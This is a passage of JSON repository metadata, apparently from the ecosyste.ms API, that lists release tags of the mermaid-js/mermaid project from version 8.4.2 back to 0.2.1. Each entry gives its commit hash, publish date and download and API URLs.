ermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","h